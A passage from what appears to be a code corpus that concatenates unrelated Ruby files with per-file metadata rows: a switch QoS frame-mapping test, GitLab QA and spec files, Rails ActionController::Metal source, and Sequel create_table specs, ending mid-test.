         rx_cfg: {id: 2, key: "PCP", pcp: 6, "dei" => 1},
         tx_cfg: {},
         tx_frm: {pcp: 6}, # Mapped to DEI = 1
         rx_frm: {dei: 1}  # Classified value
     },
     {
         txt: "rx dscp to dscp",
         rx_cfg: {id: 3, key: "DSCP", dscp: 39, "dscp" => 40},
         tx_cfg: {emode: "REMARK"},
         tx_frm: {tpid: 0, dscp: 39}, # Mapped to DSCP = 40
         rx_frm: {dscp: 40}           # Classified value
     },
     {
         txt: "rx pcp to cos",
         rx_cfg: {id: 4, key: "PCP", pcp: 7, "cos" => 4},
         tx_cfg: {mode: "MAPPED"},
         tx_frm: {pcp: 7}, # Mapped to (COS, DPL) = (4, 0)
         rx_frm: {pcp: 4}  # Mapped using port egress mapping
     },
     {
         txt: "rx pcp_dei to dpl",
         rx_cfg: {id: 5, key: "PCP_DEI", pcp: 4, dei: 0, "dpl" => 1},
         tx_cfg: {mode: "MAPPED"},
         tx_frm: {pcp: 4, dei: 0}, # Mapped to (COS, DPL) = (0, 1)
         rx_frm: {pcp: 1, dei: 1}  # Mapped using port egress mapping
     },
     {
         txt: "rx pcp to cosid/tx cosid to dscp",
         rx_cfg: {id: 6, key: "PCP", pcp: 5, "cosid" => 6},
         tx_cfg: {id: 7, key: "COSID", cosid: 6, "dscp" => 21},
         tx_frm: {pcp: 5, dscp: 0}, # Mapped to COSID = 6
         rx_frm: {dscp: 21}         # Mapped from COSID
     },
     {
         txt: "rx pcp to cosid_dpl/tx cosid_dpl to dscp",
         rx_cfg: {id: 8, key: "PCP", pcp: 4, "cosid" => 5, "dpl" => 1},
         tx_cfg: {id: 9, key: "COSID_DPL", cosid: 5, dpl: 1, "dscp" => 22},
         tx_frm: {pcp: 4, dscp: 0}, # Mapped to (COSID, DPL) = (5, 1)
         rx_frm: {dscp: 22}         # Mapped from (COSID, DPL)
     },
     {
         txt: "rx dscp to dscp/tx dscp to dscp",
         rx_cfg: {id: 10, key: "DSCP", dscp: 42, "dscp" => 43, "dpl" => 1},
         tx_cfg: {id: 11, key: "DSCP", dscp: 43, "dscp" => 44},
         tx_frm: {dscp: 42}, # Mapped to DSCP = 43
         rx_frm: {dscp: 44}  # Mapped from DSCP
     },
     {
         txt: "rx pcp to dscp_dpl/tx dscp_dpl to pcp",
         rx_cfg: {id: 12, key: "PCP", pcp: 4, "dscp" => 45, "dpl" => 3},
         tx_cfg: {id: 13, key: "DSCP_DPL", dscp: 45, dpl: 3, "pcp" => 5},
         tx_frm: {pcp: 4, dscp: 0},  # Mapped to (DSCP, DPL) = (45, 3)
         rx_frm: {pcp: 5, dscp: 0}   # Mapped from (DSCP, DPL)
     },
    ]
# Return the value to use for frame field +fld+: the value from the header
# hash +hdr+ when the key is present, otherwise the caller-supplied default.
#
# @param tx_fld [Object] default value used when +fld+ is absent from +hdr+
# @param hdr    [Hash]   frame header values (e.g. t[:tx_frm])
# @param fld    [Symbol] field name to look up (:pcp, :dei, :dscp, ...)
# @return [Object] hdr[fld] if the key exists (even if nil/false), else tx_fld
def frame_fld_get(tx_fld, hdr, fld)
    # Hash#fetch with a default expresses the original key?/reassign pattern
    # directly and still honours explicit nil/false header values.
    hdr.fetch(fld, tx_fld)
end
# Apply the action part of a map configuration to an ingress/egress map.
# For each supported action name present (as a String key) in +cfg+, enable
# the corresponding flag in map["action"] and copy the configured value into
# +values+ (the map entry being programmed). Keys absent from +cfg+ are left
# untouched.
def map_set(map, values, cfg)
    actions = map["action"]
    %w[cos dpl cosid pcp dei dscp].each do |key|
        next unless cfg.key?(key)
        actions[key] = true
        values[key] = cfg[key]
    end
end
# For every table entry: program the ingress port/map and egress port/map,
# then inject a frame on $idx_tx and verify the expected frame on $idx_rx.
test "frame-io" do
    $test_table.each do |t|
        t_i("Conf '#{t[:txt]}'")

        # Ingress port: attach the ingress map (0xfff detaches any map).
        cfg = t[:rx_cfg]
        port = $ts.dut.port_list[$idx_tx]
        conf = $ts.dut.call("mesa_qos_port_conf_get", port)
        conf["ingress_map"] = ((cfg.key?:id) ? cfg[:id] : 0xfff)
        $ts.dut.call("mesa_qos_port_conf_set", port, conf)

        # Ingress map: pick the map entry matching the configured key values,
        # then apply the actions from cfg (string keys) via map_set.
        if (cfg.key?:key)
            map = $ts.dut.call("mesa_qos_ingress_map_init", "MESA_QOS_INGRESS_MAP_KEY_" + cfg[:key])
            map["id"] = cfg[:id]
            maps = map["maps"]
            case (cfg[:key])
            when "PCP"
                values = maps["pcp"][cfg[:pcp]]
            when "PCP_DEI"
                values = maps["pcp_dei"][cfg[:pcp]][cfg[:dei]]
            when "DSCP"
                values = maps["dscp"][cfg[:dscp]]
            when "DSCP_PCP_DEI"
                if (cfg.key?:dscp)
                    values = maps["dpd"][cfg[:dscp]]
                else
                    values = maps["dpd"][cfg[:pcp]][cfg[:dei]]
                end
            end
            map_set(map, values, cfg)
            $ts.dut.call("mesa_qos_ingress_map_add", map)
        end

        # Egress port: attach the egress map and set tag/DSCP remark modes
        # (defaults: no map, CLASSIFIED tag remarking, DSCP rewriting disabled).
        cfg = t[:tx_cfg]
        port = $ts.dut.port_list[$idx_rx]
        conf = $ts.dut.call("mesa_qos_port_conf_get", port)
        conf["egress_map"] = ((cfg.key?:id) ? cfg[:id] : 0xfff)
        conf["tag"]["remark_mode"] = ("MESA_TAG_REMARK_MODE_" + ((cfg.key?:mode) ? cfg[:mode] : "CLASSIFIED"))
        conf["dscp"]["emode"] = ("MESA_DSCP_EMODE_" + ((cfg.key?:emode) ? cfg[:emode] : "DISABLE"))
        $ts.dut.call("mesa_qos_port_conf_set", port, conf)

        # Egress map: same pattern as the ingress map above.
        if (cfg.key?:key)
            map = $ts.dut.call("mesa_qos_egress_map_init", "MESA_QOS_EGRESS_MAP_KEY_" + cfg[:key])
            map["id"] = cfg[:id]
            maps = map["maps"]
            case (cfg[:key])
            when "COSID"
                values = maps["cosid"][cfg[:cosid]]
            when "COSID_DPL"
                values = maps["cosid_dpl"][cfg[:cosid]][cfg[:dpl]]
            when "DSCP"
                values = maps["dscp"][cfg[:dscp]]
            when "DSCP_DPL"
                values = maps["dscp_dpl"][cfg[:dscp]][cfg[:dpl]]
            end
            map_set(map, values, cfg)
            $ts.dut.call("mesa_qos_egress_map_add", map)
        end

        # Frame test: build the 'ef' command with the Tx frame (f1) and the
        # expected Rx frame (f2), then transmit/verify.
        f_base = " eth"
        f_end = " data pattern cnt 64"
        f = t[:tx_frm]
        tag = {}
        tag[:tpid] = ((f.key?:tpid) ? f[:tpid] : 0x8100)
        tag[:vid] = $vid_a
        tag[:pcp] = ((f.key?:pcp) ? f[:pcp] : 0)
        tag[:dei] = ((f.key?:dei) ? f[:dei] : 0)
        cmd = "sudo ef name f1"
        cmd += f_base
        cmd += cmd_tag_push(tag)
        if (f.key?:dscp)
            cmd += " ipv4 dscp #{f[:dscp]}"
        end
        cmd += f_end
        cmd += " name f2"
        cmd += f_base
        # Expected frame: fields not listed in rx_frm keep the Tx values.
        f = t[:rx_frm]
        tag[:pcp] = ((f.key?:pcp) ? f[:pcp] : tag[:pcp])
        tag[:dei] = ((f.key?:dei) ? f[:dei] : tag[:dei])
        cmd += cmd_tag_push(tag)
        if (f.key?:dscp)
            cmd += " ipv4 dscp #{f[:dscp]}"
        end
        cmd += f_end
        cmd += " tx #{$ts.pc.p[$idx_tx]} name f1"
        cmd += " rx #{$ts.pc.p[$idx_rx]} name f2"
        t_i("Test '#{t[:txt]}'")
        $ts.pc.run(cmd)
    end
end
| 33.084821 | 110 | 0.48536 |
33c4caaddcb21cdabf4e8d7a8918296cf81eddbb | 1,406 | # frozen_string_literal: true
module QA
  module Page
    module Group
      module SubMenus
        # Page object for the group Members page: inviting members,
        # changing their access level and removing them.
        class Members < Page::Base
          include Page::Component::UsersSelect

          view 'app/views/shared/members/_invite_member.html.haml' do
            element :member_select_field
            element :invite_member_button
          end

          view 'app/views/shared/members/_member.html.haml' do
            element :member_row
            element :access_level_dropdown
            element :delete_member_button
            element :developer_access_level_link, 'qa_selector: "#{role.downcase}_access_level_link"' # rubocop:disable QA/ElementWithPattern, Lint/InterpolationCheck
          end

          # Invite +username+ to the group via the member select widget.
          def add_member(username)
            select_user :member_select_field, username
            click_element :invite_member_button
          end

          # Change +username+'s role; +access_level+ is the role name
          # (e.g. 'Developer') matching the dropdown link selector.
          def update_access_level(username, access_level)
            within_element(:member_row, text: username) do
              click_element :access_level_dropdown
              click_element "#{access_level.downcase}_access_level_link"
            end
          end

          # Remove +username+ from the group, accepting the JS confirm dialog.
          def remove_member(username)
            page.accept_confirm do
              within_element(:member_row, text: username) do
                click_element :delete_member_button
              end
            end
          end
        end
      end
    end
  end
end
| 30.565217 | 166 | 0.623755 |
ed93a2f09cddc8882bf27db6985ff9b3f4dfb2bb | 7,512 | require "active_support/core_ext/array/extract_options"
require "action_dispatch/middleware/stack"
require "action_dispatch/http/request"
require "action_dispatch/http/response"
module ActionController
# Extend ActionDispatch middleware stack to make it aware of options
# allowing the following syntax in controllers:
#
# class PostsController < ApplicationController
# use AuthenticationMiddleware, except: [:index, :show]
# end
#
class MiddlewareStack < ActionDispatch::MiddlewareStack #:nodoc:
class Middleware < ActionDispatch::MiddlewareStack::Middleware #:nodoc:
def initialize(klass, args, actions, strategy, block)
@actions = actions
@strategy = strategy
super(klass, args, block)
end
def valid?(action)
@strategy.call @actions, action
end
end
def build(action, app = Proc.new)
action = action.to_s
middlewares.reverse.inject(app) do |a, middleware|
middleware.valid?(action) ? middleware.build(a) : a
end
end
private
INCLUDE = ->(list, action) { list.include? action }
EXCLUDE = ->(list, action) { !list.include? action }
NULL = ->(list, action) { true }
def build_middleware(klass, args, block)
options = args.extract_options!
only = Array(options.delete(:only)).map(&:to_s)
except = Array(options.delete(:except)).map(&:to_s)
args << options unless options.empty?
strategy = NULL
list = nil
if only.any?
strategy = INCLUDE
list = only
elsif except.any?
strategy = EXCLUDE
list = except
end
Middleware.new(klass, args, list, strategy, block)
end
end
# <tt>ActionController::Metal</tt> is the simplest possible controller, providing a
# valid Rack interface without the additional niceties provided by
# <tt>ActionController::Base</tt>.
#
# A sample metal controller might look like this:
#
# class HelloController < ActionController::Metal
# def index
# self.response_body = "Hello World!"
# end
# end
#
# And then to route requests to your metal controller, you would add
# something like this to <tt>config/routes.rb</tt>:
#
# get 'hello', to: HelloController.action(:index)
#
# The +action+ method returns a valid Rack application for the \Rails
# router to dispatch to.
#
# == Rendering Helpers
#
# <tt>ActionController::Metal</tt> by default provides no utilities for rendering
# views, partials, or other responses aside from explicitly calling of
# <tt>response_body=</tt>, <tt>content_type=</tt>, and <tt>status=</tt>. To
# add the render helpers you're used to having in a normal controller, you
# can do the following:
#
# class HelloController < ActionController::Metal
# include AbstractController::Rendering
# include ActionView::Layouts
# append_view_path "#{Rails.root}/app/views"
#
# def index
# render "hello/index"
# end
# end
#
# == Redirection Helpers
#
# To add redirection helpers to your metal controller, do the following:
#
# class HelloController < ActionController::Metal
# include ActionController::Redirecting
# include Rails.application.routes.url_helpers
#
# def index
# redirect_to root_url
# end
# end
#
# == Other Helpers
#
# You can refer to the modules included in <tt>ActionController::Base</tt> to see
# other features you can bring into your metal controller.
#
class Metal < AbstractController::Base
abstract!
def env
@_request.env
end
deprecate :env
# Returns the last part of the controller's name, underscored, without the ending
# <tt>Controller</tt>. For instance, PostsController returns <tt>posts</tt>.
# Namespaces are left out, so Admin::PostsController returns <tt>posts</tt> as well.
#
# ==== Returns
# * <tt>string</tt>
def self.controller_name
@controller_name ||= name.demodulize.sub(/Controller$/, "").underscore
end
def self.make_response!(request)
ActionDispatch::Response.create.tap do |res|
res.request = request
end
end
def self.encoding_for_param(action, param) # :nodoc:
::Encoding::UTF_8
end
# Delegates to the class' <tt>controller_name</tt>
def controller_name
self.class.controller_name
end
attr_internal :response, :request
delegate :session, to: "@_request"
delegate :headers, :status=, :location=, :content_type=,
:status, :location, :content_type, to: "@_response"
def initialize
@_request = nil
@_response = nil
@_routes = nil
super
end
def params
@_params ||= request.parameters
end
def params=(val)
@_params = val
end
alias :response_code :status # :nodoc:
# Basic url_for that can be overridden for more robust functionality.
def url_for(string)
string
end
def response_body=(body)
body = [body] unless body.nil? || body.respond_to?(:each)
response.reset_body!
return unless body
response.body = body
super
end
# Tests if render or redirect has already happened.
def performed?
response_body || response.committed?
end
def dispatch(name, request, response) #:nodoc:
set_request!(request)
set_response!(response)
process(name)
request.commit_flash
to_a
end
def set_response!(response) # :nodoc:
@_response = response
end
def set_request!(request) #:nodoc:
@_request = request
@_request.controller_instance = self
end
def to_a #:nodoc:
response.to_a
end
def reset_session
@_request.reset_session
end
class_attribute :middleware_stack
self.middleware_stack = ActionController::MiddlewareStack.new
def self.inherited(base) # :nodoc:
base.middleware_stack = middleware_stack.dup
super
end
# Pushes the given Rack middleware and its arguments to the bottom of the
# middleware stack.
def self.use(*args, &block)
middleware_stack.use(*args, &block)
end
# Alias for +middleware_stack+.
def self.middleware
middleware_stack
end
# Makes the controller a Rack endpoint that runs the action in the given
# +env+'s +action_dispatch.request.path_parameters+ key.
def self.call(env)
req = ActionDispatch::Request.new env
action(req.path_parameters[:action]).call(env)
end
class << self; deprecate :call; end
# Returns a Rack endpoint for the given action name.
def self.action(name)
if middleware_stack.any?
middleware_stack.build(name) do |env|
req = ActionDispatch::Request.new(env)
res = make_response! req
new.dispatch(name, req, res)
end
else
lambda { |env|
req = ActionDispatch::Request.new(env)
res = make_response! req
new.dispatch(name, req, res)
}
end
end
# Direct dispatch to the controller. Instantiates the controller, then
# executes the action named +name+.
def self.dispatch(name, req, res)
if middleware_stack.any?
middleware_stack.build(name) { |env| new.dispatch(name, req, res) }.call req.env
else
new.dispatch(name, req, res)
end
end
end
end
| 27.719557 | 88 | 0.644569 |
380b86d859317ca983a5f4b6e40e5127eabc9037 | 153 | require "hesburgh_errors/engine"
require "hesburgh_errors/controller_error_trapping"
require "hesburgh_errors/error_trapping"
# Namespace module for the engine; behavior lives in the files required above.
module HesburghErrors
end
| 21.857143 | 51 | 0.875817 |
e8b236426e907248b41d4c25d52662f7ecf01355 | 1,048 | require 'spec_helper'
# Spec for the Gitlab::Popen mixin: command output/status capture, argument
# safety and the optional working-directory argument.
describe 'Gitlab::Popen', lib: true, no_db: true do
  let(:path) { Rails.root.join('tmp').to_s }

  before do
    # Mix Popen into an anonymous class so the spec doesn't depend on a host.
    @klass = Class.new(Object)
    @klass.send(:include, Gitlab::Popen)
  end

  context 'zero status' do
    before do
      @output, @status = @klass.new.popen(%w(ls), path)
    end

    it { expect(@status).to be_zero }
    it { expect(@output).to include('cache') }
  end

  context 'non-zero status' do
    before do
      @output, @status = @klass.new.popen(%w(cat NOTHING), path)
    end

    it { expect(@status).to eq(1) }
    it { expect(@output).to include('No such file or directory') }
  end

  context 'unsafe string command' do
    # String commands would go through a shell; popen only accepts arrays.
    it 'raises an error when it gets called with a string argument' do
      expect { @klass.new.popen('ls', path) }.to raise_error(RuntimeError)
    end
  end

  context 'without a directory argument' do
    before do
      @output, @status = @klass.new.popen(%w(ls))
    end

    it { expect(@status).to be_zero }
    it { expect(@output).to include('spec') }
  end
end
| 23.818182 | 74 | 0.628817 |
bbacaab943a80a343445d7b4750e0b53fe985f1e | 249 | newparam(:name) do
include EasyType
include EasyType::Validators::Name
include EasyType::Mungers::Upcase
desc "The role name "
isnamevar
to_translate_to_resource do | raw_resource|
raw_resource.column_data('ROLE').upcase
end
end
| 17.785714 | 45 | 0.751004 |
f86cb6aed149ba36f5c9be9e9f3bb42b6b1bd02b | 2,281 | # frozen_string_literal: true
require 'spec_helper'
# EE spec for the IssueMoveList board mutation: moving an issue assigns it to
# an epic (when permitted) and repositions it between neighbouring issues.
RSpec.describe Mutations::Boards::Issues::IssueMoveList do
  let_it_be(:group) { create(:group, :public) }
  let_it_be(:project) { create(:project, group: group) }
  let_it_be(:board) { create(:board, group: group) }
  let_it_be(:epic) { create(:epic, group: group) }
  let_it_be(:user) { create(:user) }
  let_it_be(:issue1) { create(:labeled_issue, project: project, relative_position: 3) }
  let_it_be(:existing_issue1) { create(:labeled_issue, project: project, relative_position: 10) }
  let_it_be(:existing_issue2) { create(:labeled_issue, project: project, relative_position: 50) }

  let(:mutation) { described_class.new(object: nil, context: { current_user: user }, field: nil) }
  let(:params) { { board: board, project_path: project.full_path, iid: issue1.iid } }
  # Target position: between existing_issue1 (10) and existing_issue2 (50).
  let(:move_params) do
    {
      epic_id: epic.to_global_id,
      move_before_id: existing_issue2.id,
      move_after_id: existing_issue1.id
    }
  end

  before do
    stub_licensed_features(epics: true)
    project.add_reporter(user)
  end

  subject do
    mutation.resolve(**params.merge(move_params))
  end

  describe '#resolve' do
    context 'when user has access to the epic' do
      before do
        group.add_guest(user)
      end

      it 'moves and repositions issue' do
        subject

        expect(issue1.reload.epic).to eq(epic)
        expect(issue1.relative_position).to be < existing_issue2.relative_position
        expect(issue1.relative_position).to be > existing_issue1.relative_position
      end
    end

    context 'when user does not have access to the epic' do
      let(:epic) { create(:epic, :confidential, group: group) }

      # Confidential epic the user cannot read: the move is a no-op.
      it 'does not update issue' do
        subject

        expect(issue1.reload.epic).to be_nil
        expect(issue1.relative_position).to eq(3)
      end
    end

    context 'when user cannot be assigned to issue' do
      before do
        stub_licensed_features(board_assignee_lists: true)
      end

      it 'returns error on result' do
        params[:to_list_id] = create(:user_list, board: board, position: 2).id

        result = mutation.resolve(**params)

        expect(result[:errors]).to eq(['Not authorized to assign issue to list user'])
      end
    end
  end
end
| 30.413333 | 98 | 0.679088 |
08e59be02f3436209eae796630bd9804b9549636 | 25,754 | require File.join(File.dirname(__FILE__), 'spec_helper')
context "DB#create_table" do
setup do
@db = SchemaDummyDatabase.new
end
specify "should accept the table name" do
@db.create_table(:cats) {}
@db.sqls.should == ['CREATE TABLE cats ()']
end
specify "should accept the table name in multiple formats" do
@db.create_table(:cats__cats) {}
@db.create_table("cats__cats1") {}
@db.create_table(:cats__cats2.identifier) {}
@db.create_table(:cats.qualify(:cats3)) {}
@db.sqls.should == ['CREATE TABLE cats.cats ()', 'CREATE TABLE cats__cats1 ()', 'CREATE TABLE cats__cats2 ()', 'CREATE TABLE cats3.cats ()']
end
specify "should raise an error if the table name argument is not valid" do
proc{@db.create_table(1) {}}.should raise_error(Sequel::Error)
proc{@db.create_table(:cats.as(:c)) {}}.should raise_error(Sequel::Error)
end
specify "should accept multiple columns" do
@db.create_table(:cats) do
column :id, :integer
column :name, :text
end
@db.sqls.should == ['CREATE TABLE cats (id integer, name text)']
end
specify "should accept method calls as data types" do
@db.create_table(:cats) do
integer :id
text :name
end
@db.sqls.should == ['CREATE TABLE cats (id integer, name text)']
end
specify "should transform types given as ruby classes to database-specific types" do
@db.create_table(:cats) do
String :a
Integer :b
Fixnum :c
Bignum :d
Float :e
BigDecimal :f
Date :g
DateTime :h
Time :i
Numeric :j
File :k
TrueClass :l
FalseClass :m
column :n, Fixnum
primary_key :o, :type=>String
foreign_key :p, :f, :type=>Date
end
@db.sqls.should == ['CREATE TABLE cats (o varchar(255) PRIMARY KEY AUTOINCREMENT, a varchar(255), b integer, c integer, d bigint, e double precision, f numeric, g date, h timestamp, i timestamp, j numeric, k blob, l boolean, m boolean, n integer, p date REFERENCES f)']
end
specify "should accept primary key definition" do
@db.create_table(:cats) do
primary_key :id
end
@db.sqls.should == ['CREATE TABLE cats (id integer PRIMARY KEY AUTOINCREMENT)']
@db.sqls.clear
@db.create_table(:cats) do
primary_key :id, :serial, :auto_increment => false
end
@db.sqls.should == ['CREATE TABLE cats (id serial PRIMARY KEY)']
@db.sqls.clear
@db.create_table(:cats) do
primary_key :id, :type => :serial, :auto_increment => false
end
@db.sqls.should == ['CREATE TABLE cats (id serial PRIMARY KEY)']
end
specify "should accept and literalize default values" do
@db.create_table(:cats) do
integer :id, :default => 123
text :name, :default => "abc'def"
end
@db.sqls.should == ["CREATE TABLE cats (id integer DEFAULT 123, name text DEFAULT 'abc''def')"]
end
specify "should accept not null definition" do
@db.create_table(:cats) do
integer :id
text :name, :null => false
end
@db.sqls.should == ["CREATE TABLE cats (id integer, name text NOT NULL)"]
end
specify "should accept null definition" do
@db.create_table(:cats) do
integer :id
text :name, :null => true
end
@db.sqls.should == ["CREATE TABLE cats (id integer, name text NULL)"]
end
specify "should accept unique definition" do
@db.create_table(:cats) do
integer :id
text :name, :unique => true
end
@db.sqls.should == ["CREATE TABLE cats (id integer, name text UNIQUE)"]
end
specify "should accept unsigned definition" do
@db.create_table(:cats) do
integer :value, :unsigned => true
end
@db.sqls.should == ["CREATE TABLE cats (value integer UNSIGNED)"]
end
specify "should accept [SET|ENUM](...) types" do
@db.create_table(:cats) do
set :color, :elements => ['black', 'tricolor', 'grey']
end
@db.sqls.should == ["CREATE TABLE cats (color set('black', 'tricolor', 'grey'))"]
end
specify "should accept varchar size" do
@db.create_table(:cats) do
varchar :name
end
@db.sqls.should == ["CREATE TABLE cats (name varchar(255))"]
@db.sqls.clear
@db.create_table(:cats) do
varchar :name, :size => 51
end
@db.sqls.should == ["CREATE TABLE cats (name varchar(51))"]
end
specify "should use double precision for double type" do
@db.create_table(:cats) do
double :name
end
@db.sqls.should == ["CREATE TABLE cats (name double precision)"]
end
specify "should accept foreign keys without options" do
@db.create_table(:cats) do
foreign_key :project_id
end
@db.sqls.should == ["CREATE TABLE cats (project_id integer)"]
end
specify "should accept foreign keys with options" do
@db.create_table(:cats) do
foreign_key :project_id, :table => :projects
end
@db.sqls.should == ["CREATE TABLE cats (project_id integer REFERENCES projects)"]
end
specify "should accept foreign keys with separate table argument" do
@db.create_table(:cats) do
foreign_key :project_id, :projects, :default=>3
end
@db.sqls.should == ["CREATE TABLE cats (project_id integer DEFAULT 3 REFERENCES projects)"]
end
specify "should raise an error if the table argument to foreign_key isn't a hash, symbol, or nil" do
proc{@db.create_table(:cats){foreign_key :project_id, Object.new, :default=>3}}.should raise_error(Sequel::Error)
end
specify "should accept foreign keys with arbitrary keys" do
@db.create_table(:cats) do
foreign_key :project_id, :table => :projects, :key => :id
end
@db.sqls.should == ["CREATE TABLE cats (project_id integer REFERENCES projects(id))"]
@db.sqls.clear
@db.create_table(:cats) do
foreign_key :project_id, :table => :projects, :key => :zzz
end
@db.sqls.should == ["CREATE TABLE cats (project_id integer REFERENCES projects(zzz))"]
end
specify "should accept foreign keys with ON DELETE clause" do
@db.create_table(:cats) do
foreign_key :project_id, :table => :projects, :on_delete => :restrict
end
@db.sqls.should == ["CREATE TABLE cats (project_id integer REFERENCES projects ON DELETE RESTRICT)"]
@db.sqls.clear
@db.create_table(:cats) do
foreign_key :project_id, :table => :projects, :on_delete => :cascade
end
@db.sqls.should == ["CREATE TABLE cats (project_id integer REFERENCES projects ON DELETE CASCADE)"]
@db.sqls.clear
@db.create_table(:cats) do
foreign_key :project_id, :table => :projects, :on_delete => :no_action
end
@db.sqls.should == ["CREATE TABLE cats (project_id integer REFERENCES projects ON DELETE NO ACTION)"]
@db.sqls.clear
@db.sqls.clear
@db.create_table(:cats) do
foreign_key :project_id, :table => :projects, :on_delete => :set_null
end
@db.sqls.should == ["CREATE TABLE cats (project_id integer REFERENCES projects ON DELETE SET NULL)"]
@db.sqls.clear
@db.sqls.clear
@db.create_table(:cats) do
foreign_key :project_id, :table => :projects, :on_delete => :set_default
end
@db.sqls.should == ["CREATE TABLE cats (project_id integer REFERENCES projects ON DELETE SET DEFAULT)"]
@db.sqls.clear
end
specify "should accept foreign keys with ON UPDATE clause" do
@db.create_table(:cats) do
foreign_key :project_id, :table => :projects, :on_update => :restrict
end
@db.sqls.should == ["CREATE TABLE cats (project_id integer REFERENCES projects ON UPDATE RESTRICT)"]
@db.sqls.clear
@db.create_table(:cats) do
foreign_key :project_id, :table => :projects, :on_update => :cascade
end
@db.sqls.should == ["CREATE TABLE cats (project_id integer REFERENCES projects ON UPDATE CASCADE)"]
@db.sqls.clear
@db.create_table(:cats) do
foreign_key :project_id, :table => :projects, :on_update => :no_action
end
@db.sqls.should == ["CREATE TABLE cats (project_id integer REFERENCES projects ON UPDATE NO ACTION)"]
@db.sqls.clear
@db.sqls.clear
@db.create_table(:cats) do
foreign_key :project_id, :table => :projects, :on_update => :set_null
end
@db.sqls.should == ["CREATE TABLE cats (project_id integer REFERENCES projects ON UPDATE SET NULL)"]
@db.sqls.clear
@db.sqls.clear
@db.create_table(:cats) do
foreign_key :project_id, :table => :projects, :on_update => :set_default
end
@db.sqls.should == ["CREATE TABLE cats (project_id integer REFERENCES projects ON UPDATE SET DEFAULT)"]
@db.sqls.clear
end
specify "should accept inline index definition" do
@db.create_table(:cats) do
integer :id, :index => true
end
@db.sqls.should == ["CREATE TABLE cats (id integer)", "CREATE INDEX cats_id_index ON cats (id)"]
end
specify "should accept inline index definition for foreign keys" do
@db.create_table(:cats) do
foreign_key :project_id, :table => :projects, :on_delete => :cascade, :index => true
end
@db.sqls.should == ["CREATE TABLE cats (project_id integer REFERENCES projects ON DELETE CASCADE)",
"CREATE INDEX cats_project_id_index ON cats (project_id)"]
end
specify "should accept index definitions" do
@db.create_table(:cats) do
integer :id
index :id
end
@db.sqls.should == ["CREATE TABLE cats (id integer)", "CREATE INDEX cats_id_index ON cats (id)"]
end
specify "should accept unique index definitions" do
@db.create_table(:cats) do
text :name
unique :name
end
@db.sqls.should == ["CREATE TABLE cats (name text, UNIQUE (name))"]
end
specify "should raise on full-text index definitions" do
proc {
@db.create_table(:cats) do
text :name
full_text_index :name
end
}.should raise_error(Sequel::Error)
end
specify "should raise on spatial index definitions" do
proc {
@db.create_table(:cats) do
point :geom
spatial_index :geom
end
}.should raise_error(Sequel::Error)
end
specify "should raise on partial index definitions" do
proc {
@db.create_table(:cats) do
text :name
index :name, :where => {:something => true}
end
}.should raise_error(Sequel::Error)
end
specify "should raise index definitions with type" do
proc {
@db.create_table(:cats) do
text :name
index :name, :type => :hash
end
}.should raise_error(Sequel::Error)
end
specify "should accept multiple index definitions" do
@db.create_table(:cats) do
integer :id
index :id
index :name
end
@db.sqls.should == ["CREATE TABLE cats (id integer)", "CREATE INDEX cats_id_index ON cats (id)", "CREATE INDEX cats_name_index ON cats (name)"]
end
specify "should accept custom index names" do
@db.create_table(:cats) do
integer :id
index :id, :name => 'abc'
end
@db.sqls.should == ["CREATE TABLE cats (id integer)", "CREATE INDEX abc ON cats (id)"]
end
specify "should accept unique index definitions" do
@db.create_table(:cats) do
integer :id
index :id, :unique => true
end
@db.sqls.should == ["CREATE TABLE cats (id integer)", "CREATE UNIQUE INDEX cats_id_index ON cats (id)"]
end
specify "should accept composite index definitions" do
@db.create_table(:cats) do
integer :id
index [:id, :name], :unique => true
end
@db.sqls.should == ["CREATE TABLE cats (id integer)", "CREATE UNIQUE INDEX cats_id_name_index ON cats (id, name)"]
end
specify "should accept unnamed constraint definitions with blocks" do
@db.create_table(:cats) do
integer :score
check {(:x.sql_number > 0) & (:y.sql_number < 1)}
end
@db.sqls.should == ["CREATE TABLE cats (score integer, CHECK ((x > 0) AND (y < 1)))"]
end
specify "should accept unnamed constraint definitions" do
@db.create_table(:cats) do
check 'price < ?', 100
end
@db.sqls.should == ["CREATE TABLE cats (CHECK (price < 100))"]
end
specify "should accept hash constraints" do
@db.create_table(:cats) do
check :price=>100
end
@db.sqls.should == ["CREATE TABLE cats (CHECK (price = 100))"]
end
specify "should accept named constraint definitions" do
@db.create_table(:cats) do
integer :score
constraint :valid_score, 'score <= 100'
end
@db.sqls.should == ["CREATE TABLE cats (score integer, CONSTRAINT valid_score CHECK (score <= 100))"]
end
specify "should accept named constraint definitions with block" do
@db.create_table(:cats) do
constraint(:blah_blah) {(:x.sql_number > 0) & (:y.sql_number < 1)}
end
@db.sqls.should == ["CREATE TABLE cats (CONSTRAINT blah_blah CHECK ((x > 0) AND (y < 1)))"]
end
specify "should accept composite primary keys" do
@db.create_table(:cats) do
integer :a
integer :b
primary_key [:a, :b]
end
@db.sqls.should == ["CREATE TABLE cats (a integer, b integer, PRIMARY KEY (a, b))"]
end
specify "should accept named composite primary keys" do
@db.create_table(:cats) do
integer :a
integer :b
primary_key [:a, :b], :name => :cpk
end
@db.sqls.should == ["CREATE TABLE cats (a integer, b integer, CONSTRAINT cpk PRIMARY KEY (a, b))"]
end
specify "should accept composite foreign keys" do
@db.create_table(:cats) do
integer :a
integer :b
foreign_key [:a, :b], :abc
end
@db.sqls.should == ["CREATE TABLE cats (a integer, b integer, FOREIGN KEY (a, b) REFERENCES abc)"]
end
specify "should accept named composite foreign keys" do
@db.create_table(:cats) do
integer :a
integer :b
foreign_key [:a, :b], :abc, :name => :cfk
end
@db.sqls.should == ["CREATE TABLE cats (a integer, b integer, CONSTRAINT cfk FOREIGN KEY (a, b) REFERENCES abc)"]
end
specify "should accept composite foreign keys with arbitrary keys" do
@db.create_table(:cats) do
integer :a
integer :b
foreign_key [:a, :b], :abc, :key => [:real_a, :real_b]
end
@db.sqls.should == ["CREATE TABLE cats (a integer, b integer, FOREIGN KEY (a, b) REFERENCES abc(real_a, real_b))"]
@db.sqls.clear
@db.create_table(:cats) do
integer :a
integer :b
foreign_key [:a, :b], :abc, :key => [:z, :x]
end
@db.sqls.should == ["CREATE TABLE cats (a integer, b integer, FOREIGN KEY (a, b) REFERENCES abc(z, x))"]
end
specify "should accept composite foreign keys with on delete and on update clauses" do
@db.create_table(:cats) do
integer :a
integer :b
foreign_key [:a, :b], :abc, :on_delete => :cascade
end
@db.sqls.should == ["CREATE TABLE cats (a integer, b integer, FOREIGN KEY (a, b) REFERENCES abc ON DELETE CASCADE)"]
@db.sqls.clear
@db.create_table(:cats) do
integer :a
integer :b
foreign_key [:a, :b], :abc, :on_update => :no_action
end
